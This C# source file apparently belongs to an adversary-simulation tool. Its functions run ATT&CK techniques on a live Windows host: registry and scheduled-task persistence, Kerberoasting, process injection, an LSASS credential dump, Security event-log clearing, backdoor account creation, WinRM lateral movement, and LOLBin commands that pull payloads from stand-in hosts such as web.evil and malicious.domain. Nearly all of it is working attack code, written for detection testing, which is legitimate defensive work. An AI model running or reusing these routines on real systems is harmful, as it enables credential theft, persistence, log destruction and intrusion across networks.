public static void CreateRegistryRunKeyCmd(string log, bool cleanup)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1547.001");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
string regKey = "BadApp";
string binpath = @"C:\Windows\Temp\xyz12345.exe";
ExecutionHelper.StartProcess("", String.Format(@"REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V {0} /t REG_SZ /F /D {1}", regKey, binpath), logger);
if (cleanup)
{
Thread.Sleep(3000);
ExecutionHelper.StartProcess("", String.Format(@"REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V {0} /F", regKey), logger);
}
else
{
logger.TimestampInfo(@"The created RegKey : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" + regKey + " was not deleted as part of the simulation");
}
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void Kerberoasting(string log, int sleep = 0)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1208");
//logger.TimestampInfo(String.Format("Starting T1208 Simulation on {0}", Environment.MachineName));
//logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id));
if (sleep > 0)
{
Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep);
}
try
{
//NetworkCredential cred = null;
List <String> spns;
spns = Ldap.GetSPNs();
foreach (String spn in spns)
{
Lib.SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", "", logger);
if (sleep > 0)
{
Thread.Sleep(sleep * 1000);
}
}
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void Kerberoasting(string log, int sleep)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1558.003");
if (sleep > 0)
{
logger.TimestampInfo(String.Format("Sleeping {0} seconds between each service ticket request", sleep));
}
try
{
//NetworkCredential cred = null;
List <String> spns;
spns = Ldap.GetSPNs();
foreach (String spn in spns)
{
Lib.SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", "", logger);
if (sleep > 0)
{
Thread.Sleep(sleep * 1000);
}
}
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void CreateScheduledTaskCmd(string log, bool cleanup)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1053.005");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
string taskName = "BadScheduledTask";
string binpath = @"C:\Windows\Temp\xyz12345.exe";
ExecutionHelper.StartProcess("", String.Format(@"SCHTASKS /CREATE /SC DAILY /TN {0} /TR ""{1}"" /ST 13:00", taskName, binpath), logger);
if (cleanup)
{
ExecutionHelper.StartProcess("", String.Format(@"SCHTASKS /DELETE /F /TN {0}", taskName, binpath), logger);
Thread.Sleep(3000);
}
else
{
logger.TimestampInfo(@"The created Scheduled Task " + taskName + " was not deleted as part of the simulation");
}
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void ProcessInjection(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1055");
//logger.TimestampInfo(String.Format("Starting T1055 Simulation on {0}", Environment.MachineName));
//logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id));
try
{
Process proc = new Process();
proc.StartInfo.FileName = "C:\\Windows\\system32\\notepad.exe";
proc.StartInfo.UseShellExecute = false;
proc.Start();
logger.TimestampInfo(String.Format("Process {0}.exe with PID:{1} started for the injection", proc.ProcessName, proc.Id));
DefenseEvasionHelper.ProcInjection_CreateRemoteThread(Convert.FromBase64String(Lib.Static.donut_ping), proc, logger);
//DefenseEvasionHelper.ProcInjection_APC(Convert.FromBase64String(Lib.Static.donut_ping), proc, logger);
//DefenseEvasionHelper.ProcInjection_CreateRemoteThread(Lib.Static.msf_meter, not);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void DomaiGroupDiscoveryLdap(PlaybookTask playbook_task, string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1069.002");
logger.TimestampInfo("Using LDAP to execute technique");
try
{
if (playbook_task.groups.Length > 0)
{
foreach (string group in playbook_task.groups)
{
logger.TimestampInfo(String.Format("Querying LDAP for members of '{0}'", group));
DiscoveryHelper.LdapQueryForObjects(logger, 2, "", group);
}
logger.SimulationFinished();
}
else
{
logger.TimestampInfo("Querying LDAP for all groups");
DiscoveryHelper.LdapQueryForObjects(logger, 2);
logger.SimulationFinished();
}
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void CreateLocalAccountCmd(string log, bool cleanup)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1136.001");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
string username = "******";
string pwd = "Passw0rd123El7";
ExecutionHelper.StartProcess("", String.Format("net user {0} {1} /add", username, pwd), logger);
Thread.Sleep(2000);
if (cleanup)
{
ExecutionHelper.StartProcess("", String.Format("net user {0} /delete", username), logger);
}
else
{
logger.TimestampInfo(String.Format("The created local user {0} was not deleted as part of the simulation", username));
}
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void CreateWindowsServiceCmd(string log, bool cleanup)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1543.003");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
string serviceName = "UpdaterService";
string servicePath = @"C:\Windows\Temp\superlegit.exe";
ExecutionHelper.StartProcess("", String.Format(@"sc create {0} binpath= {1} type= own start= auto", serviceName, servicePath), logger);
Thread.Sleep(3000);
if (cleanup)
{
ExecutionHelper.StartProcess("", String.Format(@"sc delete {0}", serviceName), logger);
}
else
{
logger.TimestampInfo(String.Format("The created Service: {0} ImagePath: {1} was not deleted as part of the simulation", serviceName, servicePath));
}
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void SystemNetworkConfigurationDiscovery(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1016");
try
{
ExecutionHelper.StartProcess("", "ipconfig /all", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void WindowsCommandShell(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1059.003");
try
{
ExecutionHelper.StartProcessApi("", "cmd.exe /C whoami", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void LsassMemoryDump(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1003.001");
try
{
CredAccessHelper.LsassMemoryDump(logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void SystemUserDiscovery(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1033");
try
{
ExecutionHelper.StartProcess("", "whoami", logger);
ExecutionHelper.StartProcess("", "query user", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void SystemServiceDiscovery(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1007");
try
{
ExecutionHelper.StartProcess("", "net start", logger);
ExecutionHelper.StartProcess("", "tasklist /svc", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void DomainAccountDiscoveryLdap(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1087.002");
logger.TimestampInfo("Using LDAP to execute this technique");
try
{
DiscoveryHelper.ListUsersLdap(logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void FileAndDirectoryDiscovery(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1083");
try
{
ExecutionHelper.StartProcess("", @"dir c:\ >> %temp%\download", logger);
ExecutionHelper.StartProcess("", @"dir C:\Users\ >> %temp%\download", logger, true);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void CreateLocalAccountApi(string log, bool cleanup)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1136.001");
logger.TimestampInfo("Using the Win32 API NetUserAdd function to execute the technique");
try
{
PersistenceHelper.CreateUserApi("haxor", logger, cleanup);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void ExecutePowershell(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1086");
try
{
string encodedPwd = "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==";
ExecutionHelper.StartProcess("", String.Format("powershell.exe -enc {0}", encodedPwd), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void Rundll32(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.011");
try
{
string file = @"C:\Windows\twain_64.dll";
ExecutionHelper.StartProcess("", String.Format("rundll32 \"{0}\"", file), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void InstallUtil(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.004");
try
{
string file = @"C:\Windows\Temp\XKNqbpzl.exe";
ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfiles /LogToConsole=alse /U {0}", file), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void ClearSecurityEventLogCmd(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1070.001");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
ExecutionHelper.StartProcess("", "wevtutil.exe cl Security", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void Csmtp(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.003");
try
{
string file = @"C:\Users\Administrator\AppData\Local\Temp\XKNqbpzl.txt";
ExecutionHelper.StartProcess("", String.Format("cmstp /s /ns {0}", file), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void XlScriptProcessing(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1220");
try
{
string url = "http://webserver/payload.xsl";
ExecutionHelper.StartProcess("", String.Format("wmic os get /FORMAT:\"{0}\"", url), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void Mshta(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.005");
try
{
string url = "http://webserver/payload.hta";
ExecutionHelper.StartProcess("", String.Format("mshta {0}", url), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void ExecuteWmiCmd(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1047");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
ExecutionHelper.StartProcessNET("wmic.exe", String.Format(@"process call create ""powershell.exe"""), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void NetworkServiceDiscovery(int nhost, int tsleep, string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1046");
logger.TimestampInfo("Using the System.Net.Sockets .NET namespace to execute this technique");
try
{
var rand = new Random();
int computertype = rand.Next(1, 6);
List <Task> tasklist = new List <Task>();
List <Computer> targetcomputers = Lib.Targets.GetHostTargets(computertype, nhost, logger);
logger.TimestampInfo(String.Format("Obtained {0} target computers for the scan", targetcomputers.Count));
if (tsleep > 0)
{
logger.TimestampInfo(String.Format("Sleeping {0} seconds between each network scan", tsleep));
}
foreach (Computer computer in targetcomputers)
{
if (!computer.Fqdn.ToUpper().Contains(Environment.MachineName.ToUpper()))
{
Computer temp = computer;
TimeSpan interval = TimeSpan.FromSeconds(5);
tasklist.Add(Task.Factory.StartNew(() =>
{
logger.TimestampInfo(String.Format("Starting port scan against {0} ({1})", temp.ComputerName, temp.IPv4));
DiscoveryHelper.PortScan(temp, interval);
}));
if (tsleep > 0)
{
Thread.Sleep(tsleep * 1000);
}
}
}
Task.WaitAll(tasklist.ToArray());
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void WinRmCodeExec(int nhost, int tsleep, string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1021.006");
logger.TimestampInfo("Using the System.Management.Automation .NET namespace to execute this technique");
try
{
var rand = new Random();
int computertype = rand.Next(1, 6);
logger.TimestampInfo(String.Format("Querying LDAP for random targets..."));
List <Computer> targethosts = Lib.Targets.GetHostTargets(computertype, nhost);
logger.TimestampInfo(String.Format("Obtained {0} target computers", targethosts.Count));
List <Task> tasklist = new List <Task>();
//Console.WriteLine("[*] Starting WinRM Based Lateral Movement attack from {0} running as {1}", Environment.MachineName, WindowsIdentity.GetCurrent().Name);
if (tsleep > 0)
{
logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", tsleep));
}
foreach (Computer computer in targethosts)
{
Computer temp = computer;
if (!computer.Fqdn.ToUpper().Contains(Environment.MachineName.ToUpper()))
{
tasklist.Add(Task.Factory.StartNew(() =>
{
LateralMovementHelper.WinRMCodeExecution(temp, "powershell.exe", logger);
}));
if (tsleep > 0)
{
Thread.Sleep(tsleep * 1000);
}
}
}
Task.WaitAll(tasklist.ToArray());
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void BitsJobs(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1197");
try
{
string url = "http://web.evil/sc.exe";
string file = @"C:\Windows\Temp\winword.exe";
ExecutionHelper.StartProcess("", String.Format("bitsadmin /transfer job /download /priority high {0} {1}", url, file), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void RegsvcsRegasm(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.009");
try
{
string file = @"winword.dll";
ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U {0}", file), logger);
ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U {0}", file), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void Regsvr32(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.010");
try
{
string url = @"http://malicious.domain:8080/payload.sct";
string dll = "scrobj.dll";
ExecutionHelper.StartProcess("", String.Format("regsvr32.exe /u /n /s /i:{0} {1}", url, dll), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void DeobfuscateDecode(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1140");
try
{
string encoded = "encodedb64.txt";
string decoded = "decoded.exe";
ExecutionHelper.StartProcess("", String.Format("certutil -decode {0} {1}", encoded, decoded), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}